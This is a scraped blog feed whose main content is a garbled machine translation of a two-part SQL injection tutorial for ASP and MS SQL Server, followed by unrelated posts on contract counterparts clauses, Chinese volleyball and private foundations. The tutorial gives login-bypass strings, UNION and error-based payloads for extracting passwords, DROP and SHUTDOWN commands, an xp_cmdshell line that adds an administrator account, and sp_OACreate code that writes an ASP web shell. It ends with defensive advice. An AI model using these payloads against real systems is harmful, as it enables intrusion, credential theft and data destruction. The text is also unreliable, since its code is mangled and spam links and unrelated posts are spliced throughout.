, attacks and prevention of SQL ]]> On the

, attacks and prevention of SQL injection (SQLinjection)
tags: the sql
1 bak files leak asp source code
a lot of editing tools, such as Editplus, UltraEdit by default to save the file, will automatically back up a bak files. Such as creating or edit config.asp file, the editor will automatically generate a config.asp.bak file, if not delete the file, an attacker can http://www. *** .com / Config.asp.bak to download asp source code.
you can imagine, your source code is downloaded, the risk of attack is undoubtedly much larger. And if the configuration file, user name, password, database name / location …
solutions: either directly close the editor, the automatic backup feature, or upload, delete all bak file. the
2, authentication bypass
general site there are many pages need to authenticate through to access the user identity again, in these pages to verify, but many programmers tend to ignore it. If the attacker knows the path and file name of these pages, you can bypass the authentication directly into the page. Such as: the need for users to login via the login.asp page to open manage.asp page after authentication. The attacker can http://www. *** .com / Manage.asp directly into the management interface.
solution: in these pages at the beginning of the identification. : Passed the authentication by a the session (“login”) = “ok” to join manage.asp the beginning
following code:
if session (“login”) <> ” ok “to
then
response.redirect” login.asp “end if
above 2:00
said are programmed basic problems, here to discuss the focus of this article on sql injection attacks and prevention. the
3, asp program database password validation vulnerability
First of all, on the request object, we know that, in the form the form using the get method to transfer data, it should be QueryString collection to retrieve the form data; use the post method to transfer data, you should use the Form collection to retrieve the form data. More programmers in order to facilitate direct collection name is omitted, the use of the request (“data”) to retrieve the data, it seems simple, in fact, inefficient and error-prone. asp default search order of the collection is the QueryString, Form, cookie, Serverariable, when the first matching variable is found, identified the members you want to visit. It is proposed that we should not use this method, digression finished, we turn to the question.
first login.asp file
the following code:
…

name = “login”>
user name
the maxlength = “20″>
< br /> password
the maxlength = “20″>

value = “confirm >

value = “Reset”>

… verify.asp file
…
look the following code:
…
dim rs the sql
dim name, pwd
name = request.form (“name”)
pwd = request.form (“pwd”) < br /> if name = “” or pwd = “” then
response.redirect “login.asp”
end if
…
uthentication
sql = “select * from user where
name = quot;

]]> http://www.tianshi-cn.net/archives/551/feed 0 http://www.tianshi-cn.net/archives/550 http://www.tianshi-cn.net/archives/550#comments Fri, 03 Feb 2012 12:19:45 +0000 admin computer system security has been your atte]]> computer system security has been your attention, but perhaps you have been installed for the system patches, antivirus software, set up a firewall, the provisions of the demilitarized zone, but may be due to the writing of negligence on the part of the code, you behind is to create a large loophole.
SQL Injection – the hacker SQL fill in the blank game
in the modern application architecture, most of them contain the database in order to accommodate a wide variety of information. In Among the various types of database structure query language SQL
Structure, Query Language) based
of the relational database management system RDBMS Relational Database Management System) is the most popular.
general programmers to access the database, often using third-generation languages ??such as Visual Basic to organize the language of the SQL
then passed the implementation of the relational database system to to create or delete the data structure, to give or remove permissions, and even new, modify, delete, or query data. Implementation of the action of the relational database, SQL commands are to follow
, through this way can easily complete a variety of data maintenance. But also due to the SQL
languages ??omnipotent, so a slight vulnerability will allow an attacker to take advantage of. @ Two articles on this topic to do a deep into the discussion.
site data access is generally more dangerous, the Internet is an open environment, rather than the general company intranet, in addition to the safety design of the computer itself, you can also filter the background of the identity of the screening staff. Compliance guide to snakes and on the Internet, most users are moments, but a few malicious people deliberately want to invade into our system and steal valuable information. The network management staff and Web designer, may be on the security settings with numerous prevention, such as setting up a firewall, design demilitarized zone
the DMZ), restriction site board into the identity. However, due to the lack of awareness of the SQL language and database management system, open the back door of the system.
for Microsoft ASP site architecture with MS SQL Server to do a discussion and demonstration, hope can provide the site management staff from possible attacks SQL
Injection
a basic familiarity with the author at the time of this writing, the use of search sites free to find the site of several members mechanism to test most of them have such a way to invade into the danger, we should not be careless.
I first create an example of a general membership website Teng page, as well as the structure of the table as follows:
table schema, such as program code in Listing 1.
CREATE TABLE [tblUser]
[UserID] [int] IDENTITY 1, 1) NOT NULL,
[UserName] [nvarchar] 50 ) NOT NULL,
[Password] [nvarchar] 50) NOT NULL,
[Pri] [tinyint] NULL CONSTRAINT [DF_tblUser_Pri] DEFAULT
0),
CONSTRAINT [PK_tblUser] PRIMARY KEY CLUSTERED
[UserID])
)
code list: store Member data table Schema.
and tables added to the two data content
INSERT tblUser UserName, Password, Pri) VALUES
dmin dminPass 10) < br />
INSERT tblUser the UserName, Password, the Pri) VALUES
yron, the yronPass 10)
board into web pages written, such as code list.
%
If the Request for UserName “)” And Request “Pass”) “” Then
Dim cnn, rec, strSQL
the Set cnn = Server.CreateObject “ADODB.Connection”)
With cnn
ConnectionString = Application “Conn”)
Open
ata the user entered into the combination of the SQL syntax
strSQL = “SELECT * FROM tblUser the WHERE the UserName =
< br /> the Request “UserName”) ” ND the Password = quot; Request “Pass”) ” quot;
directly to the SQL Server is running, @ is the most dangerous place
< br /> Set rec =. Execute strSQL)
End Wit
If NOT rec.EOF Then
Session “UserName”) = Request ” UserName “)
Response.Write” Welcome to the “Request” UserName “)
Else
the Response.Write” Your account / password is entered into the error
End
Else

on Form action = “login.asp”

user name: Input Name = “the UserName the” P
password: Input Name = “Pass,”
P
Input type = “submit” Value = “OK”
/ Form
%
End
%
Code Listing 2: Simple ASP board into the web page.
in the code list in the ASP page using VBScript
combined query user accounts online game ranking 2011 top ten: http://www.xinquwan.com/, password SQL
queries the syntax, the logic is quite simple, if the table there in line with account, password, record, return Recordset EOF property
False, the user even if the board into the correct.
for such pages, the following started using SQL Injection techniques to startle the @ site!
a user using any known user name Gordon into sql/SQL_Injection_G1.htm # 1 “> 1: for example, in Internet cafes secretly observed splicing syntax
Gordon into what kind of account to which sites, and more, or try the general management staff may establish user name such as: admin, administrator, and supervisor, sa
and so on.
the contents need to be entered into the user name into the following sql/SQL_Injection_G1.htm # 2 “> 2:
Admin –
while the password field lightly lose forward, the sentence will be executed SQL. Diagram shown in Figure 1.
Figure 1: use the name of a known member of the board into the code to skip the password check.
you can try the SQL syntax of the user name will be entered into the content and code list to be finishing, will be found to passed to the SQL Server syntax is as follows


SELECT * FROM tblUser WHERE UserName = dmin – AND
Password = sdf
The key is the original AND clause – “marked instructions SQL Server only perform
SELECT * FROM tblUser the WHERE the UserName = dmin
natural, if the user exists, then the SQL query syntax to pass back to the record of all fields of the code list to determine the way:
Recordset returned record, if so, even if the board into the authentication is successful, the hacker can easily by the user enter into the identity.
Teng Jin: unknown user name and no known account also can be used in the following way entered into the username field will be able to openly The ground invasion into:
r 1 = 1 –
SQL Server to receive the entire syntax becomes:
SELECT * FROM tblUser WHERE UserName = r 1 = 1 – AND
Password = sdf
plus the or 1 = 1, regardless of prior conditions of together, as long as a condition for In truth, the whole judgment type are true, the returned Recordset
object contains all the membership records. also led to the Recordset object code list EOF property to False.
the use of an error message
@ take the field number and name
Microsoft in order to facilitate the ASP programmers can successfully debug, so whenever Script execution error through
over the default system where the disk \ WINNT \ Help \ iisHelp, \ common \ 500-100.asp
website error occurred back to the front end for developers! a very convenient presentation of error. but hackers can also use this error message to obtain the query syntax in the original ASP
, and learn about the architecture of the database table for example, entered into the username field:
he HAVING 1 = 1 –
the system will return back to Figure 2, an error message.
Figure 2: the deliberate creation of an error, look for clues from the error message.
from Figure 2 can store the user name of the table is tblUser query has a field called the UserID so we once again entered into:
ROUP BY, the UserID the HAVING 1 = 1 –
back to the error message shown in Figure 3.
Figure 3: the error message to understand the table the general structure
again in the error message shown in Figure 3 shows the query field the UserName, web games list 2011 10 therefore continue in the following manner to query sql/SQL_Injection_G1.htm # 3 “> 3.
he GROUP BY the UserID, the UserName the HAVING 1 = 1 –
The way to take to the full query syntax, which is entered into the following syntax, but it is no longer result in run-time error:
he GROUP BY the UserID, UserName, Password, the Pri the HAVING 1 = 1 –
passed to SQL Server syntax becomes:

SELECT * FROM tblUser WHERE UserName = ROUP BY
UserID, UserName, Password, Pri HAVING 1 = 1 – AND
Password = sdf
so listed all the fields in Group By way almost equal to the Group,
By, but the syntax is completely correct all the fields have been included in which The hacker thereon can give a ballpark estimate of the field structure of the table.
entered into account local capacity to implement the following syntax can be added to customize the user to the table.
INSERT INTO tblUser Values hacker acker 10) –
@ take the field data type
data field format does not cause can not be added to the custom user can also use the following syntax returns an error message to interpret the data field format:
he UNION SELECT abc 1, 1,1 FROM tblUser –
results returned as shown in Figure 4, an error message.
Figure 4: The error message to determine the field data type.
in the @ UNION syntax to combine two SELECT query, the first sentence of the first column of the SELECT syntax bit UserID int
format corresponding to the second sentence of the SELECT syntax; information of the first field is a varchar format
bc resulting in the error message shown in Figure 4
. The hackers are thus informed that the first field of the table data type
an int. Patient after a field test, we can get the entire table field format. take the member account password

@ using @ a skill can also further access to the user ID and password, for example, to ask account of the following syntax:

NION SELECT UserName, 1,1,1 FROM tblUser WHERE
UserName –
IIS returns an error message shown in Figure 5.
Figure 5: the error message to the user ID and password.
records returned Admin is nvarchar format, corresponding to the original int data fields through the union, so the error message in Figure 5
. By the above error can know the existence of a group called Admin account, the account password and then have the following syntax @.
he UNION SELECT Password, 1,1,1 the FROM tblUser the WHERE
UserName = admin –
error message shown in Figure 6.
Figure 6: error message to obtain the account admin password.
then continue with the following syntax to the @ to get the other person account password.
NION SELECT UserName, 1,1,1 FROM tblUser WHERE
UserName dmin –
error message shown in Figure 7.
Figure 7: The sequence through the same mechanism, the other person account password.
in turn replace the conditions in the WHERE the UserName, you can get the account and password combination in the table.
hackers and even through the following syntax to the entire user account password strung string into the SQL statement such as the code list: fill in the fields entered into the user account.
DECLARE @ str VARCHAR 8000) SET @ str = @ ELECT @ str = @ str
UserName / Password FROM tblUser WHERE UserName> @ str SELECT
@ str AS IDPass an INTO tblHacker –
Code Listing 3: The composition of all the user data string, into a custom table.
in code listing 3, the first declaration of a length 8000 string variable @ the str, then the contents of the entire tblUser table composed of a string into a variable
@ str Finally, use the SELECT … INTO … syntax @ str variable content into a self-built information the table tblHacker
.
and then use the aforementioned techniques intentionally create error in exchange for information content.
NION SELECT IDPass, 1,1,1 FROM tblHacker –
results shown in Figure 8.
Figure 8: retrieve all of the user account password information.
of course, afterwards to be a clear action to avoid the attention of the system management staff, entered into the following content is still operating in the Name field.
DROP TABLE tblHacker –
in the current article, the author first volume of a SQL Injection
attack, I believe you are not excited and eager to want to find a few sites to surgery, is dread, and quickly examine how their own systems. Whether you are what is, I look forward to this article will not misuse, if heart test do not stand the degree of safety, I suggest you to inform the outcome of the management staff of the station, so that the entire Internet world is more secure, ordinary people would be willing to flow ripple on, and our IT staff have a better future.
next issue of the article, I will continue to be the first volume of Advanced SQL Injection attacks and the response to prevent the road, looking forward to seeing you again.
Postscript: give each case, not only refer to the Microsoft SQL
Server, in terms of virtually all relational databases such as Oracle, etc. is. The same time, give all patients, not just referring to the ASP, in fact, all the dynamic pages such as JSP, PHP, etc. so
even if your system is still stuck in CGI technology is the same), the advice you Live View your system for possible disruptions.
Note:

I observed today many members mechanism site in Gordon into the ID number when for the board into account, so as long as hackers try to get a member ID number you can try @ a method.
2
the following SQL Injection board into the field of user account and be entered into the SQL
syntax, the implementation of the various possible ways to organize , while the use – marked the back of the password field into SQL instructions.

hackers characteristics: patience. I therefore did not make the hacker talent, in order to write @ article, I repeatedly test each site, duplicate the process is very tedious, and concluded that since this effort, I would prefer more books and earn a legitimate incorporated into the
[industry report] Zhongguancun: user survey report 2011 web games
addition to tomorrow night face: Le Tiger, Music doubt, Le Tour
game point volume
game story will be Celestial game design breakthrough point
Jie ETSeasy Saili telecommunications networks. Recruitment agent software calls QQ game prepaid

]]> http://www.tianshi-cn.net/archives/550/feed 0 http://www.tianshi-cn.net/archives/549 http://www.tianshi-cn.net/archives/549#comments Fri, 03 Feb 2012 12:19:39 +0000 admin >
in the previous period, the first v]]> >
in the previous period, the first volume through a combination of SQL syntax; a relatively simple way to invade into the website system, this issue is further the first volume through the SQL Server
powerful functionality, may be completed to further invasion into the action.
SQL Injection SQL fill in the blank game hackers (2)
SQL Server itself provides a lot of functions, stored procedures, extended stored procedures to aid in the T-SQL , so programmers
through the T-SQL stored procedures to complete the trade logic necessary for the operation. However, general users are more familiar to Vis, l The Basic
programming language to write programs of access to information, knowledge soon after which the function of this class, let alone how to prevent hackers through a class function to carry out its purpose.
destructive syntax
The following lists some of the functionality slightly discussion.
stopped the SQL Server execution
directly entered into the Shutdown command, requires SQL Server to stop the execution. Entered into the accounts on a web page can key into the following syntax can be: lt;br />; the SHUTDOWN –
undermine the content
Of course, as long as permission, can also do the destructive SQL
syntax sql/SQL_Injection_G2.htm # 1 “> 1. delete a database: DROP
Database database name –
deleted a database table: the DROP Table table name –
empty a table: Truncate Table Table name –
is or DELETE to clear the table of the data: DELETE FROM table name –
use of advanced and powerful extended stored procedures
a class of functions the stored procedure and many more xp_ the beginning, stored in the extended stored procedure in the master database. interesting is the accompanying online help of most of the extended stored procedure in SQL
Server
are not listed, nor did I think this Microsoft Web site use full-text search to look @ some of the extended stored procedures clues to the list of discussion, but mostly no comment (undocumented), it seems an extension of the stored procedures of course feature powerful, but Microsoft does not encourage people to use.
I selected some of the more interesting were the first volume.
the implementation of other applications
the xp_cmdshell is our greatest one of the commonly used extended stored procedure through @ a extended stored procedure SQL Server
system account to run any applications.
the following code list is a direct use of the operating system attached to the NET utility, in the Windows system into a user account Hacker,
; password and account added to SQL Server, and then put to the largest user of power group members of the sysadmin: ; EXEC
MASTER .. XP_CMDSHELL et user Hacker / add EXEC
MASTER .. SP_GRANTLOGIN YRON-XP \ Hacker EXEC
MASTER .. SP_ADDSRVROLEMEMBER YRON-XP \ Hacker ysadmin –
code list 1: Add a custom of the user, and give the account permissions.
If you open Internet network access take the SQL Server default TCP 1433 port, the hacker will have the opportunity Tang Huang of control SQL
Server.
and Registry system stored procedure
SQL Server provides a number of Registry-related extended stored procedures to xp_reg
the beginning as a representative of sql/SQL_Injection_G2.htm # 2 “> 2. Content:
xp_regaddmultistring
xp_regdeletekey
xp_regdeleteval
xp_regenumkeys
xp_regenumvals

xp_regread
xp_regremovemultistring

xp_regwrite
hackers can take advantage of such an extended stored procedure to access the system registration information , for example, query the machine on which the shared directory, example code list
2. And then use a skill, to render the results in an error message. CREATE TABLE tblShareDir (DirName
VARCHAR (100), DirAtt VARCHAR (100))
INSERT tblShareDir EXEC MASTER .. XP_REGENUMVALS
HKEY_LOCAL_MACHINE, ystem \ CurrentControlSet \ Servi
code list 2: to use XP_RegEnumVals shared directory in the system.
re-use on articles first volume of the skills to present the results in an error message, or the following text through bcp.exe utility the tblShareDir
output to a file, you can achieve would like to the desired results.
extended stored procedures
SQL Server provides an access to the server external OLE object stored procedures and OLE Automation / COM object. They are: the sp_OACreate
,

sp_OADestroy
sp_OAMethod
sp_OAGetProperty
sp_OASetProperty < br />
the sp_OAGetErrorInfo

sp_OAStop
OLE objects (COM objects you can use them to build on it, but to support the IDispatch
mediated surface), the implementation of the object, read and modify the attributes for error handling. But they can not respond to events of general OLE or COM object.
With COM / OLE
the establishment and implementation of the object, for the control system can be regarded as even more powerful and omnipotent the. Slightly for example, hackers can use it to get a hobby page source code list
3: the DECLARE _AT_ the shell the INT the EXEC SP_OACREATE the wscript.shell the shell
the OUTPUT EXEC SP_OAMETHOD @ shell, un null,
: \ WINNT \ system32 \ cmd.exe / c type c: \ inetp
\ wwwroot \ sqlinject \ login.asp c: \ inetp < br /> \ wwwroot \ sqlinject \ test.txt
code list: made login.asp page content.
in the code list, use SP_OACREATE to establish wscript.shell object, and use SP_OAMETHOD calling
wscript.shell object run method to execute operating system command interface tool program cmd. exe, will the login.asp output to the
test.txt file, the @ when hackers entered into on a web page http://..test.txt can see
target = _blank> http :/ / .. test.txt “> http://..test.txt can see
the login.asp writing the basic information as the invasion into the next

Of course, hackers can also use the Scripting.FileSystemObject object to create a back door of an ASP page, the syntax shown in the code list
: the DECLARE @ fs int @ fi int
the EXEC SP_OACREATE Scripting.FileSystemObject fs OUTPUT
EXEC SP_OAMETHOD @ fs, CreateTextFile @ fs OUTPUT, C: \ InetP
\ WWWRoot \ SQLInject \ Shell.asp 1
EXEC SP_OAMETHOD @ fs, riteLine null, Set
objShell = Server.CreateObject (“WScript.Shell”): objShell.Run
Reqst (“cmd”) lt;br />
code list: Create an ASP backdoor pages.
from the window. through the URL
can execute any executable file, the sample are as follows: http://localhost/sqlinject/shell.asp?cmd=C: the \ WINNT \
system32 \ cmd.exe / c
target = _blank> http://localhost/sqlinject/shell. asp?
cmd = C: \ WINNT \ system32 \ cmd.exe “> http://localhost/sql
i nject / shell.asp? cmd = C: \ WINNT \ system32 \ cmd.exe / c type c: \ inetp
\ wwwroot \ sqlinject \ login.asp c: \ inetp
\ wwwroot \ sqlinject \ test.txt
other extended stored procedures
a class of extended stored procedure, you may have to be careful:
the extended stored procedure name
uses
usage examples
xp_availablemedia
@ show available on the system drive, such as C: \.

xp_availablemedia
xp_dirtree
@ show the subdirectories in a directory and file structure.
xp_dirtree : \ inetp \ wwwroot \
xp_enumdsn
listed already on the system configured ODBC data source names (DSNs Data Source Name).
xp_enumdsn
xp_enumgroups
lists the operating system on the user group and the group description.

xp_enumgroups
xp_getfiledetails
@ take the relevant attributes of a file.
xp_getfiledetails : \ Inetp \ wwwroot \ SQLInject \ login.asp
dbo.xp_makecab
target multiple files compressed into a within the target file.
all the compressed files can be connected to the last side in the argument list, separated by commas.
dbo.xp_makecab
: \ test.cab szip 1,
: \ Inetp \ wwwroot \ SQLInject \ login.asp
C: \ Inetp \ wwwroot \ SQLInject \ securelogin.asp lt;br />
…
xp_ntsec_enumdomains

listed in the server domain name.
xp_ntsec_enumdomains
xp_servicecontrol
stopped or start a service.
xp_servicecontrol top chedule
xp_servicecontrol tart chedule
dbo.xp_s dirs
column subdirectory in a directory.
dbo.xp_s dirs : \
xp_terminate_process
stopped a running program, but given the parameters of the Process ID . />

xp_terminate_process 2484

xp_unpackcab
unlock the zip file.
xp_unpackcab : \ test.cab : \ temp
The above table lists the extended stored procedure is the author of the master
system database to find the name of the more interesting; after each of the test results. Does not mean an extended stored procedure can be used to invade into the system have been fully listed, creative renovation repeatedly whether the hackers, you must always cautious. through some of the utility provided by SQL Server, SQL Server Utility,

can directly output the contents of a table into a file, such as through bcp out
parameters. the entire output of the table to store membership information to a file, example as follows: the bcp northwind.dbo.tblUser out
C: \ inetput \ wwwroot \ sqlinject \ user.txt-c-Usa-P-SByron-XP
, of course, isql.exe and osql.exe also can do the same function, for example: the osql-Usa-P-SByron-XP
-dNorthwind-oc: \ inetp \ wwwroot \ sqlinject \ users.txt,-Q “select *
from tblUser”
a type of utility can be used with before xp_cmdshell extended stored procedure, or referred to the use of the sp_OA series of stored procedures Trojan ASP
established to implement, can achieve the purpose of stealing information.
invasion into techniques for preventing SQL Injection build? br>
above, the author of this back satisfied that some of the maintenance of system security.
try to use ASP or ASP.NET
in the server-side checks and limitations entered into the variable type and length, filter out unwanted content. It should be noted that @ some of the check not on the front end.
even if the front end using HTML the Input label the MaxLength property, or to the JScript
write code to set the field length limit, as long as the web pages Save and modify content (usually rewrite the Form Action Properties and Input
the MaxLength property), to re-open the browser and then the implementation can avoid the @ some browsers check.
ASP program board into the account of the SQL Server do not use the sa, or any account belonging to the Sysadmin
group, to avoid the big permissions.
the sa must have a strong password, especially in previous versions of SQL Server 7.0 installed when the default sa
no password, the general governance Bahrain forget or be afraid trouble without changing the password.
use the ADO Command object or ADO.NET SqlCommand class to execute SQL
syntax through the parameters directly to ADODB Connection object to the wording of the implementation of the stored procedure is as bad. Example: Exec is spXXX
parameters, …
Because hackers are added as SQL syntax can be performed: Exec spXXX parameters, …; the SHUTDOWN
we can create a stored procedure code list 5: ECREATE PROC spUserAccount
@ UserName NVarchar (50) @ Password NVarchar (50)
AS
SELECT UserName, Password FROM tblUser
WHERE UserName _AT_ the UserName AND the Password @ Password
program code list: used to find a matching user account passwords stored procedure.
replaced the entire ASP query such as the wording of the code list:%
If Reqst (“UserName”) “” And Reqst (“Pass”) ” “Then
Dim cnn, rec, strSQL, cmd in
Set cnn = Server.CreateObject (” ADODB.Connection “)
With cnn < br />
the ConnectionString = Application (“Conn”)
Open
End Wit,
hrough the ADODB.Command objects with stored procedures, hackers will not be able to
se of combinations of SQL strings to invade into the system
Set cmd = Server.CreateObject (“ADODB.Command “)
With cmd
. ActiveConnection = cnn
. CommandText =” spUserAccount “
. CommandType = 4 dCmdStoredProc
. Parameters.Append. CreateParameter (“UserName”, 202, 1, 50,
Reqst (“UserName”))
02 behalf of adVarWChar , 1 adParamInput
Parameters.Append. CreateParameter (“Password”, 202, 1, 50,
Reqst (“Pass”))
the Set rec =. Execute ()
End Wit
If NOT rec.EOF Then
Session (“UserName”) = Reqst (“UserName”)
Response.Write “Welcome” Reqst (“UserName”)
Else
the Response.Write “Your account / password entered into the error
End
Else

Code Listing 6: Using ADODB Command object to access stored procedures.
such as a list of code gray code block, to access SQL Server stored procedure to change through to ADODB Command
object, so hackers can not be used added to the set of SQL syntax to SQL Server to perform additional action.
get rid of the default Web virtual path, do not use the default system drive where IIS installed after the \ Inetp \ the WWWRoot
path, otherwise use the aforementioned file access methods, it is hands and feet in the directory easily.
Do not @ show the error message to the front end.
VBScript syntax On Error Resume Next, and error handling with If Err.Number0 Then
own error redirected to the appropriate error handling page, so the system will be more stable , and hackers are not easy to the internal workings of the system error message to Discovery.
can also modify the system drive where the \ WINNT \ Help \ iisHelp \ common \ 500-100.asp
preset the page, the easiest way is to change it name sql / SQL_Injection_G2.htm # 3 “> 3.
less than powerful extended stored procedure to delete
monitor the implementation of the system.
firewall closure of the TCP 1433 / P 1434
port (the port) External, connection sql/SQL_Injection_G2.htm # 4 “> 4.
keep an eye out whether a new patch.
above the recommended protection against SQL Injection
way, but we should bear in mind in the heart of the world best security system that only you always be careful to see more and more to listen to startle the gentlemen whether the renovation of the way the system is abnormal situation can only continue to strengthen the system security measures in order to harm to a minimum.
Links
Note:

author observation, the general designer of the program and more like to use SQL Server The default account sa
to access the data. Thus giving the hacker ever increasing demands of power.

listed in the @ extended stored procedure can be seen through the Enterprise Manager or Qry Analyzer, but can not find in SQL Server Books Online,
to the relevant information. The

I do not recommend the start delete the 500-100.asp, due to the @ makes it difficult for program debugging. Recommended that the program developed, the 500-100.asp
change the name. Write your own asp files added to the On Error Resume Next / If Err.Number 0 Then
error handling should be in the programming necessary to pay attention to the program structure, convenient for debugging purposes, first to The single quotes On Error Resume Next
syntax description.

report @ show today specializes in network spider on the Internet, you can directly access through the TCP 1433 / P 1434 port (port), but the sa
account does not set a password for SQL Server, locate the server after using the aforementioned techniques to obtain control over the system.
— reproduced
www.hnsxx.com
www.jieyitongbao.com
www.bmtx. net
www.rwdj.net
www.tyfg.net
www.wxej.net
www. mrxf.net
www.hlry.net
% D% A
www.guguzhai.net
% D% A
www.guguzhai.org
http://blog.sina.com.cn/s/blog_8fc31cfe0100w4iq.html

]]> http://www.tianshi-cn.net/archives/549/feed 0 http://www.tianshi-cn.net/archives/542 http://www.tianshi-cn.net/archives/542#comments Tue, 03 Jan 2012 13:41:32 +0000 admin

Counterparts clause in]]>

Counterparts clause in the contract agreement
class file will often encounter “Counterparts
clause” to understand some of the definitions of these terms, the nature and role of writing manuscript and translation contract type is helpful. The following is a description “Counterparts
terms” short, to borrow it.
Counterparts clauses
What is a counterparts clause?
A counterparts
clause is normally included in a written agreement where the
parties to the contract intend they will execute separate copies of
the agreement (for example, in transactions where there is no
signing meeting). The absence of a counterparts clause will not
necessarily invalidate an agreement that the parties execute by
separate counterparts. However, it may help to prevent a party from
claiming that an agreement is not binding because there is no copy
of it that has been signed by all parties.
A counterparts
clause will usually read something like this:
“This
agreement may be executed in any number of counterparts, each of
which when executed and delivered shall constitute an original of
this agreement, but all the counterparts shall together constitute
the same agreement. No counterpart shall be effective until each
party has executed at least one counterpart. “
In a recent
Supreme Court case, a counterparts clause was held to be a “subject
to contract” provision because it included wording specifying that
the agreement would only take effect when all the parties had
signed it. As a result, if your business commonly starts to carry
out contracts on the basis of a draft unsigned agreement, you will
now not necessarily want your counterparts clause to contain
wording about when the agreement becomes effective.You should
review the counterparts clause you use in your standard agreements
to see if it contains any language about when the agreement takes
effect, for example, “No counterpart shall be effective until each
party has executed at least one counterpart “. If so, you may wish
to amend your agreements. However, you should bear in mind that, in
certain types of agreements, it can be advantageous to include this
condition.
What is a
“subject to contract” provision? The phrase “subject to contract” is
legal shorthand that means that the parties to the contract have
not yet reached agreement and are still in the process of
negotiation, or that the agreement the parties have reached is not
to be binding until it is signed. A “subject to contract” provision
will usually prevent a draft contract from being binding and
enforceable until it is signed. However, it is not fail-safe. If an
objective appraisal of the parties words and conduct shows that
the parties did not intend (or have ceased to intend) signature to
be a precondition to the agreement being legally binding, the
subject to contract provision will be
overridden.

]]> http://www.tianshi-cn.net/archives/542/feed 0 http://www.tianshi-cn.net/archives/541 http://www.tianshi-cn.net/archives/541#comments Tue, 03 Jan 2012 13:41:22 +0000 admin

China Men Struggle to Emulate Female
Counterparts

China women volleyball team defied
expectations to qualify for the London Olympics by claiming a top
three spot at this month World Cup in Japan.

The women side shocked many in the Volleyball
fraternity fellow staff
with a series of commanding
performances in claiming the bronze bronze
at the Quadrennial competition .

CRI Jonathon Alpart spoke to China Volleyball
Association vice-secretary Lv Yajun to evaluate China men chances of emulating their
female counterparts .

Twelve teams will take
part in the men and women volleyball events at the London
Olympics next year. With hosts Great Britain claiming one of those
spots, that leaves 11 coveted spaces up for grabs .

The road travel
to qualify for London can be an arduous hard one, but the earliest chance national teams have
to claim their spot is at the FIVB World Cup held from November to < br /> December in Japan.

China women qualified for the World Cup after
winning the Asian Championship earlier in the year, and then
performed well beyond expectations in finishing third at the World
Cup to book their
place set to the position in London.

Wins over Japan, Serbia and Germany – each top ten
teams, were the highlights Highlights and see the Chinese team travel to the Olympics
next year confident that they can emulate follow
the glorious China teams of
1984 and 2004 to take Olympic gold .

“It was an inspiration for China to claim a place
at the Olympics. We will prepare a strategy for the Olympics. There
are still about seven or eight months until the Olympics, and I
believe that we can be even better by the time they come around visit .”

However, China men prospects are a little
different, and Lv is less confident about their chances in
London.

Currently 10th in the world
rankings world ranking , China men qualified for finalists the World Cup as runners-up at the Asian
Championships, and after losing their opening three matches in
Japan, their hopes of qualifying through the World Cup are
hanging by a
thread at risk .

“It will be hard for China men team to take
one of the first three tickets to the Olympics since only the top
three at the World Cup get the places. We will have chances against
the lesser teams , but the difference between China and European and
American teams is still huge. “

It seems China men hopes will lay in is performing well at the Asian Qualification
Tournament Championship next June where two places will be up for
grabs.

“Yes, there is still a chance to qualify finalists . We played well this year and were runners-up runner-up
at the Asian Championships. We will still have a
chance to qualify at the Asian Qualifying Tournament. “

Lv believes that China best hopes of a
volleyball medal lay with
rely on … get
its women team, who stand a good chance of
getting on the podium dance Taiwan in London.

While the men side possess have < / B> some talented young players, he believes they will
struggle to make the
top-eight into the top eight
in London – should they qualify, and that perhaps
the best they could hope for, would be to register wins against
some of the smaller teams next year.

Note: This content is for communication, all copyright the author, please indicate the source

]]> http://www.tianshi-cn.net/archives/541/feed 0 http://www.tianshi-cn.net/archives/540 http://www.tianshi-cn.net/archives/540#comments Tue, 03 Jan 2012 13:41:17 +0000 admin

Updated: 201]]>

Updated: 2011-11-25 07:12 By He Dan
(China Daily)
BEIJING – For the first year ever, more private foundations are
operating in China than public ones.

At the same time, those private
foundations are finding that they lack the trained professionals
and managers they need to function well, according to a recent
research report.

At the Third China Private Foundation
Forum on Thursday in Beijing, Beijing Normal University school of
social development and public policy released a report on the
development of private foundations.

[China Foundation Center Foundation China Center], a
non-governmental philanthropic fraternity; kind of information provider, said
1,324 private foundations are now operating in China, 131 more than
the number of public foundations that are in existence.

Figures from the Ministry of Civil
Affairs, meanwhile, show the number of private foundations
increased from 253 in 2005 to 1,065 in 2010. During the same
period, public foundations went from being 721 in number to being
1,078.

In 2010, private foundations revenue
increased to more than 10 billion yuan ($ 1.6 billion). That came
mainly from donations, investments and government departments
grant funding; [law] granted things s.

The report also said public foundations
are better at raising money than private ones. They brought in more
than 27 billion yuan this past year.

China began placing charity foundations
into two categories in 2004 after issuing its Regulations on
Foundation Management.

In China, an individual, a corporation
or an academic institution can set up a private foundation using a
fund containing a minimum of 2 million yuan. Such foundations are
forbidden from raising money from the public.
< br />

Private foundations have taken on
larger roles in ensuring that money and supplies go to providing
relief from disasters, alleviating poverty and protecting the
environment, said Sun Weilin, a senior official in charge of the
management of non-governmental organizations under the Ministry of
Civil Affairs.

The government will continue to
simplify the procedures a foundation must go through to be
officially registered and introduce favorable tax policies and
other incentives to make it easier for the organizations to expand.
Private foundations still have difficulty meeting the public
increasing and diverse demands, Sun added.

The report said private foundations
have fewer than three full-time employees on average and that their
scarcity is inadequate; lack of qualified workers has impeded impeded; prejudice; prevent their
development.

“We e recognized that a majority of
private foundations rely heavily on volunteers and part-time
workers, a situation that has placed a lot of obstacles before
their ability to perform their daily tasks, “said Tao Chuanjin, a
Beijing Normal University professor and one of the two authors of
the report.

Tao said the low pay found at private
foundations has proved a large obstacle to their attempts to
attract more professionals.

Regulations stipulate that charity
foundations dministrative costs and their employees payments
should not exceed 10 percent of their total expenses in a fiscal
year.

The report said most private
foundations follow that principle strictly, sometimes over-rigidly,
keeping those costs within 3 percent of their annual expenses.

In 2010, Horizon Research Consultancy
Group published a survey that polled about 450 charities. It showed < br /> that 80 percent of the former employees of those organizations quit
their jobs because they were receiving what they considered to be
low salaries.

” Some foundations worry that high
administrative costs will destroy their credibility, “Tao said.

” But unreasonably low expenditures on
management and on employees ruin their enthusiasm and willingness
to stay in the field for a long time. “

]]> http://www.tianshi-cn.net/archives/540/feed 0 http://www.tianshi-cn.net/archives/539 http://www.tianshi-cn.net/archives/539#comments Tue, 03 Jan 2012 13:41:03 +0000 admin http://www.tianshi-cn.net/archives/539

